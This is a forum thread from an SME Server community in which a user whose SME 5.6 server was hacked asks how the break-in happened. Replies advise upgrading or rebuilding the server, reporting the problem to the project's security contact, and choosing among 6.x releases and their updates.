Topic: SME 5.6 hacked

[forumuser7]

Hi,
My SME 5.6 server happily running for 2 years was recently hacked.
The index page of my web site was replaced by another and root password was changed.
I found the following hacking tools left on the server - “massplo” and “brute”
Probably my server was used also to launch attacks against other servers…

There were the following services running on the server at that moment:
-web server - It was hosting only one postNuke based web site and php forum.
-mail server
-ftp server (anon. access disabled)
-ssh (remote access enabled)
Telnet was disabled.

Is it possible to find out the way the hacker broke in?
Where I should look for evidences?
Are there any known vulnerabilities in SME 5.6?

Thank you for your help in advance!

[raem]

forumuser7

>.....php forum.

Unless you have upgraded to the latest version you probably got hacked that way. There were major security issues with phpBB, is that what you were using ?

php itself also has security problems and the version on sme 5.6 would most likely be a problem also.

> Is it possible to find out the way the hacked broke in?
> Where I should look for evidences?

In the log files, if they are still there as they were probably deleted by the hacker.

Search google for similarities to your case.


> Are there any known vulnerabilities in SME 5.6?

Yes, you should not be using that as a gateway server !
It could well be that vulnerabilities in sme 5.6 allowed the hackers to break into your box !

I WOULD NOT continue using that 5.6 server.

Do a completely new rebuild of a 6.0 or 6.0.1 or 6.5 server. Do not restore from your backups as they are likely to contain hacker code which will be very difficult to totally eliminate. The hackers were probably in your machine well before they did the final damage, so recent backups may be unreliable.
A complete rebuild of your server (with minimal data restore - carefully screened) is the only way to be safe. Don't restore your configuration from the 5.6 server as you may compromise the security of your new box.

See
http://forums.contribs.org/index.php?topic=27534.0
for phpBB and php upgrade info

See
http://forums.contribs.org/index.php?topic=25064.msg102655#msg102655
for hacking info re phpBB

also the forums at www.phpBB.com from around November & December 2004 for more info re the phpBB problems

[guest22]

Please note that ALL security related issues should be mailed to security AT contribs.org, public posting in these matters is a bad idea.

[forumuser7]

RequestedDeletion, thank you for the reminder!
You are right!
I won't discuss details here and I'll post my question to the mail list you sugested .

Ray, thank you for the hints!
I won't use SME 5.6 anymore - I will try SME 6.0 or 6.0.1 or 6.5RC1 instead.
Which version you would recomend?
Which one is the most stable and secure?
Any thoughts why should I choose one over another?

Thank you very much for your time!

[raem]

[quote="forumuser7

Everything I said above was public knowledge.

> I will try SME 6.0 or 6.0.1 or 6.5RC1 instead.
> Which version you would recomend?
> Which one is the most stable and secure?
>Any thoughts why should I choose one over another?

6.0 & 6.0.1 are essentially the same, except 6.0.1 has contribs.org branding. Both are stable & secure final releases.
6.5RC1 is a release candidate for 6.5 final, it has additional features that were add ons to 6.x (mainly email related) & some upgraded packages, and a upgraded kernel. From what I read and my own "play" with it, it appears stable in its current form although not a final release.

To be sure use 6.x, to be a little bit experimental use 6.5RC1.
If you use 6.0 from Mitel, be sure to apply the Mitel released updates.

[forumuser7]

Ray,

If I stick with SME 6.0.1 where do I find the latest updates for 6.0.1?
I checked out the "updates" directory under "downloads" section but the only updates I found were:
initscripts-6.67-1es26.src.rpm
and
yum-1.0.3-6.1sme.src.rpm
Are these the only updates available for SME 6.0.1 or
there is another place that I should look into.

What should I do if I need to upgrade PHP, MySQL or other packages with the their latest versions?

Thank you for your help!

[raem]

forumuser7

> Are these the only updates available for SME 6.0.1

Officially yes as far as I know.
There is a smeplus update script but this is not really for updating security fixes as such, it is more for upgrading applications and installing other contribs that some people deem useful.
There have been quite a few warnings posted that users should be wary of using the smeplus scripts as you are likely to make upgrade to later sme versions very difficult or impossible, as such upgrade paths are not supported (ie due to wrong packages installed, incompatibilites, dependency problems etc)

Personally I would not run the smeplus script as it makes too many unnecessary changes to my system.

> What should I do if I need to upgrade PHP, MySQL or other packages with the their latest versions?

There are scripts & howto available for upgrading those rpms only, search contribs.org and the contribs directory structure.

[forumuser7]

Ray,
if i install SME 6.0.1 do I need to apply the updates from Mitel for v.6.0 or they are already included in SME v6.0.1 (as a later release)
Thank you for the help in advance!

[raem]

forumuser7

> if i install SME 6.0.1 do I need to apply the
> updates from Mitel for v.6.0 or they are already
> included in SME v6.0.1 (as a later release)


They are for 6.0 not for 6.0.1.

I have not checked to see if the updates for 6.0 are in 6.0.1. (I'm using 6.0)
Note that the 6.0 updates were released on 20 May 2004.
The smeserver contribs.org 6.0.1 iso has a final release date of 17 March 2004.
The initscripts-6.67-1es26.i386.rpm update for 6.0.1 has a release date of 19 March 2004.

To me that says the Mitel 6.0 updates are newer than the final release of 6.0.1.

Can anybody else answer this ?

[raem]

You can compare the 6.0 updates packages here:
ftp://ftp.ibiblio.org/pub/linux/distributions/e-smith/updates/6.0/RPMS/

with the 6.0.1 final packages here:
ftp://ftp.ibiblio.org/pub/linux/distributions/smeserver/releases/6.0.1/os/e-smith/RPMS/

To my looking there is very little difference, with a few more of the Mitel updates being more recent, but some of the packages in 6.0.1 are more recent also, probably because 6.0 was reworked to create 6.0.1.

I think the differences are really functional rather than security  related. You can update either 6.0 or 6.0.1 with later packages if you need or want to anyway.

I have always understood it that either 6.0 + 6.0 updates or 6.0.1 + 6.0.1 updates is safe to use.
One is branded Mitel, the other contribs.org.

[forumuser7]

forumuser7
To me that says the Mitel 6.0 updates are newer than the final release of 6.0.1.

Can anybody else answer this ?

It is a bit confusing...
It seems that v6.0.1 doesn't include the updates for v6.0...
Maybe it is safer to stick with v.6.0 + updates?
Any comments?

[ngomes]

The SME Server development (aka, the new releases) and maintenance (aka, the updates) depends entirely on the Contribs.org community.

Just to keep all of you up to date, Ian Wells, Floyd Hartog, Dave Kainer and Matthew Copple (sorry if I left someone out) are the people trying to give to this community the SME Server 6.x maintenance and bugfix updates and  bring to live the SME Server 6.5 final stable release.

Contribs.org needs your help on this project.
What can you do for Contribs.org?

# Read the maintenance process:
http://no.longer.valid/phpwiki/index.php/Maintenance%20Process

# Join the devinfo mailing list and offer your help to test, debug, etc:
http://lists.contribs.org/mailman/listinfo/devinfo

# Go to the Contribs.org Bug Tracker and study some of the listed bugs with new or feedback status, simulate them, give your feedback, try to find some sort of solution. Also if you have some packager skills try to build some rpm packages to the listed bugs with resolved or closed status:
http://no.longer.valid/mantis/view_all_bug_page.php

Finally, take these thoughts into seriously consideration (taken from Charlie Brady, a SME core developer):

If maintenance of distribution updates is not a "core role" for contribs.org, then what is?

Don't ask what contribs.org can do for me, ask what I can do for contribs.org.

-Nuno